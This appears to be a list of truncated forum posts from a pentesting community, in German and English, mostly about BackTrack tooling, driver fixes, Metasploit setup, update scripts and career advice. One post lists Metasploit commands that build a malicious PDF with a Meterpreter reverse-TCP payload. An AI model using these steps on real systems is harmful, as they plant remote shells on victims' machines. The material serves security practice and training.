https://zerohat.eu/blog/index.php/2011/04/wie-sinnvoll-sind-penetration-tests/

Schon gespannt auf die einschlägigen Expertenmeinungen!

/zerohat

Findest Du eine Unmenge im Forum!

newbie_guide [Aircrack-ng]
http://packetstormsecurity.org/papers/wireless/wifoo-ninjitsu.txt

/brtw2003

no one mentioned unique, just something to share....

hi,

I'm sure many of you have seen the (in)famous wall of sheep/shame at different cons.

So here is a basic php script (based on 99% irongeek's script), with
some modifications,css and...

YES,it is a general Linux issue, BUT Ubuntu 10.04 is already using the latest driver ;-)
BT4 is NOT based on Ubuntu 10.04 and therefore you don't have always the latest drivers included, as with any...

hi,

this is not really a BT issue, this is a general Linux challenge with all these new cards, like
with this great Windows 7 dedicated chipset from Nvidia (you need the nouveau driver..)

for...

read through this thread

http://www.backtrack-linux.org/forums/beginners-forum/446-how-change-bootsplash-backtrack-4-final.html

/brtw2003

well, for test purposes it is fine to use sqlite3 instead mysql

db_driver sqlite3
db_connect /tmp/dummy.db

HD recommends to use postgres:
Metasploit Framework - Postgres setup - Metasploit...

what version of sslstrip are you running?

1. benutz nicht wicd - versteh was unter der Haube abläuft!
mach Dich mit wpa_supplicant vertraut für WEP/WPA WLAN's
oder iwconfig um unverschlüsselte WLAN's zu konfigurieren

2....

WIFITE - try this - great wrapper around necessary aircrack-ng commands!
watch & learn...


mkdir /pentest/wireless/wifite && cd /pentest/wireless/wifite && wget -q...

just a quick note, anyone wondering why the zap.sh shell script is not working:



wget -q http://zaproxy.googlecode.com/files/ZAP_1.0.0b_installation.tar.gz
cd /pentest/web && tar xf...

follow these simple steps to use latest (a little more secure) sun java jre


1. download latest JRE
Download Java software for Linux
Linux (self-extracting file)

2.
mkdir /opt/java && cd...

in our days, nobody should trust blindley pdf downloads ;-)

windows: run it in http://www.sandboxie.com + turn of at least adobe javaScipt & external programs..
backtrack, use: PDF Tools « Didier...

to keep up-to-date with latest infosec activities, it is key to know well-known references - here my recommendations:

podcasts:
complete list: http://www.getmon.com
Eurotrash,...

..after update


msfconsole
use exploit/windows/fileformat/adobe_cooltype_sing
set OUTPUTPATH /tmp/test_adobe.pdf
set LHOST x.x.x.x
set PAYLOAD windows/meterpreter/reverse_tcp
exploit
use...

it's not BT4 related, this is the usual setup of Apache2


cd /etc/apache2/ && grep -i listen *
..will tell you, port.conf is what you are looking for (overwriting global var)

and if you run...

if you attend at security conference, the most embarrassing stuff is if you get pwned!

here you can download some simple, but very useful bash script, which gives you
some good basics to protect...

THX, just checked it out, really neat bash script ;-)
Interesting tool, unfortunately doesn't allow command line options to execute it within other scripts.

/brtw2003

here you can find a simple bash-script to update tools which are updated regularly.

It will perform the usual apt-get stuff (optional choice) and updating
tools like: set, fasttrack, nikto, w3af,...

well, very simple: DON'T use SET and fully understand what you are trying to achieve!

ReL1K includes already good options to create the appropriate payloads and if you are
not satisfied, add your...

- really enjoy infosec and be 100% committed (means you will never have the usual 8x5 job)
- university is good, but far away to teach you the full picture of infosec - you need job practice,...

hier ein ganz hilfreiches msf3 update-script (dirty, aber tut seinen Job ;-)



#!/bin/bash

cd /opt/metasploit3/msf3

if [ "$(svn info |grep 'Date:' |cut -d" " -f4)" == "$(date +%F)" ]; then...

hmm...Analyse von Social Networks oder einschlägigen Foren sind eine ware Fundgrube :-)

gruesse aus Hamburg
oscp,cissp,cisa,cism,ce|h
>>zerohat, no OS-war

hacker: thinks about solving a problem - beyond the usual imagination, doing in-depth research, develops something (re-use code) and than executes (also no hat is needed, nor grey,white or black -...